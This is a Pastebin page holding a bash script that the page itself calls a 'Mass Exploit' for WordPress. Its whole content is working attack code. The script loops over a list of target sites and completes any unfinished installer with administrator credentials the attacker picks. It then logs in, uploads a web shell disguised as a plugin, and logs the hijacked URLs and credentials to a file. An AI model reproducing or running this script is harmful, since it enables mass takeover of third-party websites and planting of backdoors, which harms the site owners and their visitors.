Fadly31337

WordPress Mass install

Apr 12th, 2021
754
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. #Coded By Con7ext
  3. green='\e[92m'
  4. blue='\e[34m'
  5. red='\e[31m'
  6. white='\e[39m'
  7. COOKIE=cookie-`date +%s`
  8. BULAN=`date +%m`
  9. TAHUN=`date +%Y`
  10. COOKIE_PATH="/tmp/$COOKIE"
  11. COOKIE_LOG="/tmp/$COOKIE"
  12. USER_AGENT="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0"
  13. ekse(){
  14.     if [[ $(curl --silent -d "weblog_title=RintoD&user_name=$user&admin_password=$pass&admin_password2=$pass&admin_email=$email&Submit=Install+Wordpress" --url "$site/wp-admin/install.php?step=2") =~ '<h1>Success!</h1>' ]];
  15.     then
  16.     printf "$green[+] Success [+]$white\n"
  17.     echo "$site/wp-login.php" | tee -a $file
  18.     echo "Username : $user" | tee -a $file
  19.     echo "Password : $pass" | tee -a $file
  20.     echo "Email    : $email" | tee -a $file
  21.     login
  22.     upload
  23.     elif [[ $(curl --silent --url "$site/wp-admin/install.php") =~ '<h1>Already Installed</h1>' ]];
  24.     then
  25.     printf "$blue[!] $site Already Installed$white\n\n"
  26.     elif [[ $(curl --silent --url "$site/wp-admin/install.php") =~ 'One or more database tables are unavailable' ]];
  27.     then
  28.     printf "$blue[!] $site Must Be Repair$white\n"
  29.     echo "Repair Url : $site/maint/repair.php?referrer=is_blog_installed"
  30.     else
  31.     printf "$red[-] $site Not Vuln$white\n";
  32.     fi
  33. }
  34. login(){
  35.     curl -s -A "$USER_AGENT" -c "$COOKIE_PATH" $site/wp-login.php > /dev/null
  36.     curl -c "$COOKIE_LOG" --silent -b "$COOKIE_PATH" -d "log=$user&pwd=$pass&wp-submit=Log+in&redirect_to=$site/wp-admin&testcookie=1" --url "$site/wp-login.php"
  37.     status=$(curl --write-out %{http_code}  --silent -b "$COOKIE_PATH" -d "log=$user&pwd=$pass&wp-submit=Log+in&redirect_to=$site/wp-admin&testcookie=1" --url "$site/wp-login.php")
  38.     if [[ $status == 302 ]];
  39.     then
  40.     echo "Login: Success" | tee -a $file
  41.     else
  42.     printf "$red[-]Login Failed$white Try Manual\n"
  43.     fi
  44.     rm "$COOKIE_PATH" 2> /dev/null
  45. }
  46. upload(){
  47.     mek=`curl -s -b "$COOKIE_LOG" --url "$site/wp-admin/plugin-install.php" | grep -Po '(?<=name="_wpnonce" value=")[^"]*()'`
  48.     mik=`curl -s -b "$COOKIE_LOG" --url "$site/wp-admin/plugin-install.php" | grep -Po '(?<=name="_wp_http_referer" value=")[^"]*()'`
  49.     ups=`curl -s -b "$COOKIE_LOG" -F "_wpnonce=$mek" -F "_wp_http_referer=$mik" -F "pluginzip=@$shell" -F "install-plugin-submit=Install+Now" --url "$site/wp-admin/update.php?action=upload-plugin"`
  50.     if [[ "$ups" =~ "Installing Plugin from uploaded file" ]];
  51.     then
  52.     echo "Success Uploading Shell $site/wp-content/uploads/$TAHUN/$BULAN/$shell" | tee -a $file
  53.     else
  54.     echo "Failed Try Manual"
  55.     echo "$ups"
  56.     fi
  57.     rm "$COOKIE_LOG" 2> /dev/null
  58. }
  59. echo "Wp Install Mass Exploit"
  60. echo "File Argumen is for save file :D just put your filename :D"
  61. echo "Created By Con7ext"
  62. read -p "List: " list
  63. read -p "User: " user
  64. read -p "Pass: " pass
  65. read -p "Email: " email
  66. read -p "Shell: " shell
  67. read -p "File: " file
  68. for site in `cat $list`;
  69. do
  70.         ekse $site &
  71. done
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×